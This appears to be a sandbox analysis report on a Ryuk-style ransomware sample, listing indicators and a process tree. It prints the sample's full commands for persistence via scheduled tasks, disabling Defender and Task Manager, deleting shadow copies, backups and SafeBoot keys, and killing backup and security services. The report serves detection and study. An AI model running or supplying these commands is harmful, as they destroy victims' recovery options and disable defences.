1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exedescription pid process Token: SeDebugPrivilege 3764 taskkill.exe Token: SeDebugPrivilege 3772 taskkill.exe Token: SeIncreaseQuotaPrivilege 2180 WMIC.exe Token: SeSecurityPrivilege 2180 WMIC.exe Token: SeTakeOwnershipPrivilege 2180 WMIC.exe Token: SeLoadDriverPrivilege 2180 WMIC.exe Token: SeSystemProfilePrivilege 2180 WMIC.exe Token: SeSystemtimePrivilege 2180 WMIC.exe Token: SeProfSingleProcessPrivilege 2180 WMIC.exe Token: SeIncBasePriorityPrivilege 2180 WMIC.exe Token: SeCreatePagefilePrivilege 2180 WMIC.exe Token: SeBackupPrivilege 2180 WMIC.exe Token: SeRestorePrivilege 2180 WMIC.exe Token: SeShutdownPrivilege 2180 WMIC.exe Token: SeDebugPrivilege 2180 WMIC.exe Token: SeSystemEnvironmentPrivilege 2180 WMIC.exe Token: SeRemoteShutdownPrivilege 2180 WMIC.exe Token: SeUndockPrivilege 2180 WMIC.exe Token: SeManageVolumePrivilege 2180 WMIC.exe Token: 33 2180 WMIC.exe Token: 34 2180 WMIC.exe Token: 35 2180 WMIC.exe Token: 36 2180 WMIC.exe Token: SeBackupPrivilege 3724 vssvc.exe Token: SeRestorePrivilege 3724 vssvc.exe Token: SeAuditPrivilege 3724 vssvc.exe Token: SeIncreaseQuotaPrivilege 2180 WMIC.exe Token: SeSecurityPrivilege 2180 WMIC.exe Token: SeTakeOwnershipPrivilege 2180 WMIC.exe Token: SeLoadDriverPrivilege 2180 WMIC.exe Token: SeSystemProfilePrivilege 2180 WMIC.exe Token: SeSystemtimePrivilege 2180 WMIC.exe Token: SeProfSingleProcessPrivilege 2180 WMIC.exe Token: SeIncBasePriorityPrivilege 2180 WMIC.exe Token: SeCreatePagefilePrivilege 2180 WMIC.exe Token: SeBackupPrivilege 2180 WMIC.exe Token: SeRestorePrivilege 2180 WMIC.exe Token: SeShutdownPrivilege 2180 WMIC.exe Token: SeDebugPrivilege 2180 WMIC.exe Token: SeSystemEnvironmentPrivilege 2180 WMIC.exe Token: SeRemoteShutdownPrivilege 2180 WMIC.exe Token: SeUndockPrivilege 2180 WMIC.exe Token: SeManageVolumePrivilege 2180 WMIC.exe Token: 33 2180 WMIC.exe Token: 34 2180 WMIC.exe Token: 35 2180 WMIC.exe Token: 36 2180 WMIC.exe Token: SeDebugPrivilege 2148 taskkill.exe Token: SeDebugPrivilege 4312 taskkill.exe Token: SeDebugPrivilege 4348 taskkill.exe Token: SeSecurityPrivilege 1576 wevtutil.exe Token: SeBackupPrivilege 1576 wevtutil.exe Token: SeSecurityPrivilege 2868 wevtutil.exe Token: SeBackupPrivilege 2868 wevtutil.exe Token: SeSecurityPrivilege 1476 wevtutil.exe Token: SeBackupPrivilege 1476 wevtutil.exe Token: SeSecurityPrivilege 3340 wevtutil.exe Token: SeBackupPrivilege 3340 wevtutil.exe Token: SeSecurityPrivilege 880 wevtutil.exe Token: SeBackupPrivilege 880 wevtutil.exe Token: SeSecurityPrivilege 3388 wevtutil.exe Token: SeBackupPrivilege 3388 wevtutil.exe Token: SeSecurityPrivilege 4544 wevtutil.exe Token: SeBackupPrivilege 4544 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1652 wrote to memory of 3956 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 3956 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 3956 wrote to memory of 4836 3956 cmd.exe schtasks.exe PID 3956 wrote to memory of 4836 3956 cmd.exe schtasks.exe PID 1652 wrote to memory of 4860 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 4860 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 4976 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 4976 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 3884 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 3884 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 3884 wrote to memory of 1292 3884 cmd.exe schtasks.exe PID 3884 wrote to memory of 1292 3884 cmd.exe schtasks.exe PID 1652 wrote to memory of 620 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 620 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 620 wrote to memory of 4192 620 cmd.exe attrib.exe PID 620 wrote to memory of 4192 620 cmd.exe attrib.exe PID 1652 wrote to memory of 4360 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 4360 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 4360 wrote to memory of 1252 4360 cmd.exe schtasks.exe PID 4360 wrote to memory of 1252 4360 cmd.exe schtasks.exe PID 1652 wrote to memory of 4184 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 4184 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 4184 wrote to memory of 1676 4184 cmd.exe schtasks.exe PID 4184 wrote to memory of 1676 4184 cmd.exe schtasks.exe PID 1652 wrote to memory of 4268 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 4268 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 4268 wrote to memory of 3428 4268 cmd.exe attrib.exe PID 4268 wrote to memory of 3428 4268 cmd.exe attrib.exe PID 1652 wrote to memory of 2412 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 2412 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 2412 wrote to memory of 2344 2412 cmd.exe attrib.exe PID 2412 wrote to memory of 2344 2412 cmd.exe attrib.exe PID 1652 wrote to memory of 1056 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 1056 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 716 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 716 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1056 wrote to memory of 4936 1056 cmd.exe cmd.exe PID 1056 wrote to memory of 4936 1056 cmd.exe cmd.exe PID 716 wrote to memory of 2296 716 cmd.exe reg.exe PID 716 wrote to memory of 2296 716 cmd.exe reg.exe PID 1652 wrote to memory of 1832 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 1832 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1832 wrote to memory of 2264 1832 cmd.exe cmd.exe PID 1832 wrote to memory of 2264 1832 cmd.exe cmd.exe PID 1652 wrote to memory of 3892 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 3892 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1832 wrote to memory of 3764 1832 cmd.exe taskkill.exe PID 1832 wrote to memory of 3764 1832 cmd.exe taskkill.exe PID 1652 wrote to memory of 3948 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 3948 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 3856 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 3856 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 2996 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 2996 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 4936 wrote to memory of 824 4936 cmd.exe icacls.exe PID 4936 wrote to memory of 824 4936 cmd.exe icacls.exe PID 2264 wrote to memory of 3772 2264 cmd.exe taskkill.exe PID 2264 wrote to memory of 3772 2264 cmd.exe taskkill.exe PID 1652 wrote to memory of 4572 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 4572 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 1164 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1652 wrote to memory of 1164 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1164 wrote to memory of 1520 1164 cmd.exe reg.exe PID 1164 wrote to memory of 1520 1164 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 5 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 268 attrib.exe 4536 attrib.exe 4192 attrib.exe 3428 attrib.exe 2344 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:4836 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
PID:4860 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵PID:4976
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
PID:1292 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
PID:4192 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:1252 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:4184 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F3⤵
- Creates scheduled task(s)
PID:1676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Windows\system32\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
PID:3428 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe3⤵
- Views/modifies file attributes
PID:2344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵PID:2296
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
PID:824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3772 -
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3764 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵PID:3892
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵PID:3948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵PID:3856
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵PID:2996
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵PID:4572
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:1520
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:3556
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:2368
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵PID:4100
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵PID:3768
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:4212
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit2⤵PID:2012
-
C:\Windows\system32\cmd.execmd.exe /c "C:\ProgramData\RyukReadMe.txt "3⤵
- Checks computer location settings
- Modifies registry class
PID:1424 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt4⤵
- Opens file in notepad (likely ransom note)
PID:2492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet2⤵PID:620
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin Delete Shadows /All /Quiet3⤵PID:3004
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:4772 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete2⤵PID:2724
-
C:\Windows\system32\cmd.execmd.exe /c wmic shadowcopy delete3⤵PID:3392
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2180 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures2⤵PID:4556
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures3⤵PID:216
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} boostatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:3100 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no2⤵PID:544
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} recoveryenabled no3⤵PID:2424
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
PID:4992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/2⤵PID:4332
-
C:\Windows\system32\cmd.execmd.exe /c wbadmin delete catalog -quiet/3⤵PID:4212
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet/4⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop avpsus /y2⤵PID:4320
-
C:\Windows\system32\net.exenet stop avpsus /y3⤵PID:772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵PID:3468
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y2⤵PID:3672
-
C:\Windows\system32\net.exenet stop McAfeeDLPAgentService /y3⤵PID:3356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵PID:4368
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop mfewc /y2⤵PID:1104
-
C:\Windows\system32\net.exenet stop mfewc /y3⤵PID:1656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵PID:2616
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y2⤵PID:1844
-
C:\Windows\system32\net.exenet stop BMR Boot Service /y3⤵PID:3448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵PID:2964
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y2⤵PID:2300
-
C:\Windows\system32\net.exenet stop NetBackup BMR MTFTP Service /y3⤵PID:2324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵PID:5048
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled2⤵PID:4128
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY start=disabled3⤵
- Launches sc.exe
PID:2396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:536
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY$ECWDB2 start= disabled3⤵
- Launches sc.exe
PID:4788 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled2⤵PID:4720
-
C:\Windows\system32\sc.exesc config SQLWriter start= disabled3⤵
- Launches sc.exe
PID:4684 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled2⤵PID:1464
-
C:\Windows\system32\sc.exesc config SstpSvc start= disabled3⤵
- Launches sc.exe
PID:1296 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F2⤵PID:2728
-
C:\Windows\system32\taskkill.exetaskkill /IM mspub.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2148 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F2⤵PID:2028
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4312 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F2⤵PID:3548
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4348 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵PID:1324
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:552 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵PID:2248
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3460 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵PID:1248
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2556 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵PID:4488
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3956 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵PID:2480
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:488 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵PID:1192
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1660 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵PID:3340
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵PID:4464
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3668 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵PID:2360
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:848 -
